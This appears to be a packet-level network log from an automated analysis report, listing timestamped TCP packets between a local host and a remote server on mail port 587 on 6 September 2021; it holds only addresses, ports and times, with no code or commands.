                                                                    Sep 6, 2021 11:22:36.846456051 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846492052 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.846513033 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846543074 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.846623898 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846724033 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846816063 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.846925974 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847022057 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847105980 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847184896 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847265005 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847311020 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.847347975 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847624063 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.847907066 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848056078 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848134995 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848215103 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848300934 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848377943 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848463058 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848540068 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848627090 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848737955 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848814011 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848907948 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.848987103 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.849076033 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.849165916 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.849617958 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.867964029 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.868823051 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.868967056 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.868992090 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869112968 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869200945 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869286060 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869363070 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869445086 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869605064 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869678974 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869779110 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869857073 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.869942904 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.870021105 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.870101929 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.870184898 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.899192095 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899244070 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899269104 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899303913 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899384022 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.899435997 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.899554968 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.899580002 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899732113 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899754047 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.899792910 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.899837971 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.899935007 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900013924 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900121927 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900202990 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900300980 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900381088 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900477886 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900557995 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900670052 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.900681019 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900758028 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.900768042 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.900795937 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.900820971 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.900846004 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.900913000 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.901012897 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.901081085 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.901140928 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.901736975 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.901762962 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.901789904 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.901817083 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.901840925 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.902132988 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.910782099 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.911639929 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.911823988 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.911921978 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.912004948 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:36.921364069 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.921394110 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.921411991 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.921952009 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.922024012 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.922049046 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.923063040 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.954035044 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.954077005 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.954116106 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.964442968 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.964488029 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:36.993927956 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.275638103 CEST5874971994.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.379040956 CEST49719587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:37.413528919 CEST5874971894.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.504878044 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:37.556991100 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.557118893 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:37.582137108 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:37.609016895 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.609217882 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:37.660394907 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.660432100 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.660605907 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:37.713546038 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.713942051 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:37.769697905 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.769757032 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.769773960 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.769799948 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:37.771982908 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:37.824224949 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.825762033 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:37.877695084 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.878128052 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:37.929764986 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:37.930159092 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.021209955 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.093187094 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.094758034 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.145941019 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.146482944 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.146831036 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.198268890 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.198623896 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.261121988 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.281377077 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.287504911 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.287806988 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.288233995 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.288584948 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.288800955 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.289022923 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.289248943 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.289484024 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.289704084 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.289916992 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.290123940 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.290348053 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.290565014 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.290779114 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.291109085 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.339327097 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.339401007 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.339407921 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.340409040 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.340431929 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.341337919 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.341362953 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.341891050 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.342314959 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.342427015 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.342473984 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.342588902 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.393707991 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.393729925 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.393744946 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.393758059 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.393876076 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.393925905 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.393995047 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.394012928 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.394083023 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.394191980 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.394220114 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.394354105 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.394535065 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.394732952 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.394920111 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.395068884 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.395206928 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.446214914 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.446355104 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.446521044 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.446871042 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.446888924 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.446929932 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.446968079 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.447082043 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.447194099 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.447211981 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.447221994 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.447252989 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.447479963 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.447645903 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.447786093 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.447920084 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.447925091 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.447942019 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.447957039 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.448076010 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.448251963 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.448398113 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.448553085 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.448698997 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.448848009 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.449008942 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.449167967 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.449316978 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.449460983 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.449724913 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.449897051 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.450059891 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.450216055 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.450364113 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.450511932 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.450680017 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.450841904 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.450999975 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.451159000 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.451311111 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.451575041 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.451733112 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.451890945 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.452039957 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.452199936 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.452367067 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.452523947 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.452683926 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.487430096 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.487520933 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.487776041 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.498066902 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.498094082 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.498109102 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.498157978 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.498189926 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.498239994 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.499172926 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.499191999 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.499794960 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.499955893 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.500024080 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.500080109 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.500185013 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.500197887 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.500205040 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.500216007 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.500222921 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.500243902 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.501018047 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.501137972 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.501246929 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.501322985 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.501367092 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.501378059 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.501446962 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.501456976 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.502019882 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.502088070 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.502098083 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.502206087 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.503110886 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.503175974 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.503191948 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.503288031 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.503366947 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.504199982 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.504405022 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.504564047 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.504795074 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.504935026 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.505074024 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.505207062 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.505352974 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.505517006 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.505702972 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.505861998 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.506031990 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.506155968 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.506356001 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.506599903 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.506771088 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.506923914 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.507128000 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.507247925 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.507389069 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.507602930 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.507734060 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.507855892 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.507985115 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.508224010 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.509761095 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.510031939 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.510236025 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.510350943 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.510603905 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.510649920 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.510798931 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.511025906 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.511137962 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.511204004 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.511306047 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:38.539272070 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.539302111 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.549644947 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.551357031 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.551379919 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.556443930 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.556535006 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.557450056 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.557507038 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.557581902 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.558547020 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.558585882 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.558620930 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.559607983 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.559643984 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.561580896 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.561625004 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.561662912 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:38.562628984 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:39.047698975 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:39.269846916 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:39.303277016 CEST5874972194.100.180.160192.168.2.3
                                                                    Sep 6, 2021 11:22:39.303375006 CEST49721587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:22:58.419142008 CEST49718587192.168.2.394.100.180.160
                                                                    Sep 6, 2021 11:23:04.335916996 CEST4971280192.168.2.3104.16.154.36

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
